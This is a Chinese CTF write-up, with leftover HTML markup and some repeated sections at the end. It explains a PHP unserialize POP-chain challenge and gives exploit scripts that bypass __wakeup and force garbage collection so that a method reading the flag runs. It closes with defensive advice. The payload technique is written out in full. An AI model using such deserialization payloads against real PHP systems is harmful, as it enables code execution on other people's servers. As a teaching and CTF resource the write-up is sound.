PHP垃圾回收机制与反序列化POP链构造详解<\/h1>

一、背景与问题描述<\/h2>
这是一个关于利用PHP垃圾回收机制构造POP链的技术分析，源自第四届浙江省赛的一道CTF题目。题目展示了如何通过PHP的反序列化漏洞和垃圾回收机制来执行任意代码。<\/p>

二、题目代码分析<\/h2>

error_reporting<\/span>(E_ALL<\/span>);
<\/span><\/span>ini_set<\/span>('display_errors'<\/span>, true<\/span>);
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>
<\/span><\/span>class<\/span> Fun<\/span> {
<\/span><\/span>    private<\/span> $func =<\/span> 'call_user_func_array'<\/span>;
<\/span><\/span>    public<\/span> function<\/span> __call($f, $p){
<\/span><\/span>        call_user_func<\/span>($this-><\/span>func<\/span>, $f, $p);
<\/span><\/span>    }
<\/span><\/span>    public<\/span> function<\/span> __wakeup(){
<\/span><\/span>        $this-><\/span>func<\/span> =<\/span> ''<\/span>;
<\/span><\/span>        die<\/span>("Don't serialize me"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Test<\/span> {
<\/span><\/span>    public<\/span> function<\/span> getFlag<\/span>(){
<\/span><\/span>        system<\/span>("cat \/flag?"<\/span>);
<\/span><\/span>    }
<\/span><\/span>    public<\/span> function<\/span> __call($f, $p){
<\/span><\/span>        phpinfo<\/span>();
<\/span><\/span>    }
<\/span><\/span>    public<\/span> function<\/span> __wakeup(){
<\/span><\/span>        echo<\/span> "serialize me?"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> A<\/span> {
<\/span><\/span>    public<\/span> $a;
<\/span><\/span>    public<\/span> function<\/span> __get($p){
<\/span><\/span>        if<\/span>(preg_match<\/span>("\/Test\/"<\/span>, get_class<\/span>($this-><\/span>a<\/span>))){
<\/span><\/span>            return<\/span> "No test in Prod<\/span>\n<\/span>"<\/span>;
<\/span><\/span>        }
<\/span><\/span>        return<\/span> $this-><\/span>a<\/span>-><\/span>$p();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> B<\/span> {
<\/span><\/span>    public<\/span> $p;
<\/span><\/span>    public<\/span> function<\/span> __destruct(){
<\/span><\/span>        $p =<\/span> $this-><\/span>p<\/span>;
<\/span><\/span>        echo<\/span> $this-><\/span>a<\/span>-><\/span>$p;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>if<\/span>(isset<\/span>($_GET['pop'<\/span>])){
<\/span><\/span>    $pop =<\/span> $_GET['pop'<\/span>];
<\/span><\/span>    $o =<\/span> unserialize<\/span>($pop);
<\/span><\/span>    throw<\/span> new<\/span> Exception<\/span>("no pop"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>三、常规解法分析<\/h2>
1. 目标<\/h3>
调用Test类的getFlag方法获取flag。<\/p>
2. POP链构造思路<\/h3>
B → A → Fun → Test<\/p>
3. 关键点<\/h3>

通过B类的__destruct<\/code>方法触发整个链<\/li>
A类的__get<\/code>方法在访问不可访问属性时触发<\/li>
Fun类的__call<\/code>方法可以调用任意函数<\/li>
需要绕过Fun类的__wakeup<\/code>方法（通过修改属性数量）<\/li>
<\/ul>
4. 常规EXP<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> Fun<\/span> {
<\/span><\/span>    private<\/span> $func;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>func<\/span> =<\/span> [new<\/span> Test<\/span>, 'getFlag'<\/span>];
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Test<\/span> {
<\/span><\/span>    public<\/span> function<\/span> getFlag<\/span>(){}
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> A<\/span> {
<\/span><\/span>    public<\/span> $a;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> B<\/span> {
<\/span><\/span>    public<\/span> $p;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$Test =<\/span> new<\/span> Test<\/span>;
<\/span><\/span>$Fun =<\/span> new<\/span> Fun<\/span>;
<\/span><\/span>$a =<\/span> new<\/span> A<\/span>;
<\/span><\/span>$b =<\/span> new<\/span> B<\/span>;
<\/span><\/span>$a-><\/span>a<\/span> =<\/span> $Fun;
<\/span><\/span>$b-><\/span>a<\/span> =<\/span> $a;
<\/span><\/span>$r =<\/span> serialize<\/span>($b);
<\/span><\/span>$r1 =<\/span> str_replace<\/span>('"Fun":1:'<\/span>, '"Fun":2:'<\/span>, $r);
<\/span><\/span>echo<\/span> urlencode<\/span>($r1);
<\/span><\/span><\/code><\/pre>四、垃圾回收机制解法<\/h2>
1. 问题<\/h3>
常规解法中__destruct<\/code>是隐式销毁触发的，但题目中throw new Exception<\/code>会中断对象销毁。<\/p>
2. PHP垃圾回收机制<\/h3>
旧GC（PHP5.3前）<\/h4>

基于引用计数<\/li>
每个内存对象分配计数器<\/li>
变量引用时计数器+1，撤掉引用时-1<\/li>
计数器=0时销毁对象<\/li>
问题：循环引用导致内存泄漏<\/li>
<\/ul>
新GC<\/h4>

使用zval变量容器<\/li>
包含"is_ref"(是否引用集合)和"refcount"(引用计数)<\/li>
垃圾回收算法检查数组和对象的循环引用<\/li>
<\/ul>
3. 触发垃圾回收的方法<\/h3>

手动调用gc_collect_cycles()<\/code><\/li>
垃圾存储空间将满（默认10000个zval）<\/li>
<\/ol>
4. 反序列化中触发GC的原理<\/h3>

反序列化允许重复传递相同索引<\/li>
不断填充空间导致旧元素引用计数器递减<\/li>
当zval被销毁时触发垃圾回收算法<\/li>
所有创建的数组开始填充垃圾缓冲区直至空间不足<\/li>
<\/ul>
5. 关键技术点<\/h3>

利用ArrayObject的反序列化函数引用其他数组<\/li>
通过特定结构使引用计数器递减<\/li>
需要使引用计数器增加2后再递减3次<\/li>
<\/ul>
6. GC解法EXP<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> B<\/span> {
<\/span><\/span>    public<\/span> $p;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>a<\/span> =<\/span> new<\/span> A<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> A<\/span> {
<\/span><\/span>    public<\/span> $a;
<\/span><\/span>    public<\/span> function<\/span> __construct(){
<\/span><\/span>        $this-><\/span>a<\/span> =<\/span> new<\/span> Fun<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>class<\/span> Fun<\/span> {
<\/span><\/span>    private<\/span> $func =<\/span> 'call_user_func_array'<\/span>;
<\/span><\/span>    public<\/span> function<\/span> __construct() {
<\/span><\/span>        $this-><\/span>func<\/span> =<\/span> "Test::getFlag"<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>$o =<\/span> array<\/span>(new<\/span> B<\/span>, new<\/span> B<\/span>);
<\/span><\/span>$a =<\/span> serialize<\/span>($o);
<\/span><\/span>echo<\/span> urlencode<\/span>(str_replace<\/span>('O:3:"Fun":1:'<\/span>, 'O:3:"Fun":2:'<\/span>, $a));
<\/span><\/span><\/code><\/pre>7. 优化版本<\/h3>
$o =<\/span> array<\/span>(new<\/span> B<\/span>, new<\/span> B<\/span>);
<\/span><\/span>$tmp =<\/span> "i:0;"<\/span>.<\/span>serialize<\/span>(new<\/span> B<\/span>);
<\/span><\/span>$a =<\/span> serialize<\/span>($o);
<\/span><\/span>$z =<\/span> str_replace<\/span>($tmp,$tmp.<\/span>" "<\/span>,$a);
<\/span><\/span>echo<\/span> urlencode<\/span>(str_replace<\/span>('O:3:"Fun":1:'<\/span>,'O:3:"Fun":2:'<\/span>,$z));
<\/span><\/span><\/code><\/pre>五、关键知识点总结<\/h2>

POP链构造<\/strong>：通过一系列魔术方法的调用链实现代码执行<\/li>
__wakeup<\/code>绕过<\/strong>：通过修改序列化字符串中的属性数量<\/li>
垃圾回收触发<\/strong>：

填满垃圾存储空间（默认10000个zval）<\/li>
利用ArrayObject的反序列化特性<\/li>
<\/ul>
<\/li>
引用计数操作<\/strong>：

反序列化过程中创建引用会使计数器+2<\/li>
需要特定结构使计数器递减3次<\/li>
<\/ul>
<\/li>
异常处理<\/strong>：throw new Exception会中断正常对象销毁，需要强制GC<\/li>
<\/ol>
六、防御建议<\/h2>

避免反序列化用户输入<\/li>
使用__wakeup<\/code>进行安全检查<\/li>
对敏感类实现Serializable<\/code>接口进行更严格的控制<\/li>
更新到最新PHP版本，利用其安全改进<\/li>
<\/ol>
七、参考资料<\/h2>

Breaking PHP's Garbage Collection and Unserialize (原始英文资料)<\/li>
如何攻破PHP的垃圾回收和反序列化机制(上)<\/li>
PHP官方文档关于垃圾回收和序列化的部分<\/li>
<\/ol>

PHP垃圾回收机制与反序列化POP链构造详解<\/h1>

一、背景与问题描述<\/h2> 这是一个关于利用PHP垃圾回收机制构造POP链的技术分析，源自第四届浙江省赛的一道CTF题目。题目展示了如何通过PHP的反序列化漏洞和垃圾回收机制来执行任意代码。<\/p>

三、常规解法分析<\/h2>

1. 目标<\/h3> 调用Test类的getFlag方法获取flag。<\/p>

2. POP链构造思路<\/h3> B → A → Fun → Test<\/p>

四、垃圾回收机制解法<\/h2>

1. 问题<\/h3> 常规解法中__destruct<\/code>是隐式销毁触发的，但题目中throw new Exception<\/code>会中断对象销毁。<\/p>

七、参考资料<\/h2> Breaking PHP's Garbage Collection and Unserialize (原始英文资料)<\/li> 如何攻破PHP的垃圾回收和反序列化机制(上)<\/li> PHP官方文档关于垃圾回收和序列化的部分<\/li> <\/ol>

一、背景与问题描述<\/h2>
这是一个关于利用PHP垃圾回收机制构造POP链的技术分析，源自第四届浙江省赛的一道CTF题目。题目展示了如何通过PHP的反序列化漏洞和垃圾回收机制来执行任意代码。<\/p>

1. 目标<\/h3>
调用Test类的getFlag方法获取flag。<\/p>

2. POP链构造思路<\/h3>
B → A → Fun → Test<\/p>

1. 问题<\/h3>
常规解法中`__destruct<\/code>是隐式销毁触发的，但题目中throw new Exception<\/code>会中断对象销毁。<\/p>`

七、参考资料<\/h2>

Breaking PHP's Garbage Collection and Unserialize (原始英文资料)<\/li>
如何攻破PHP的垃圾回收和反序列化机制(上)<\/li>
PHP官方文档关于垃圾回收和序列化的部分<\/li> <\/ol>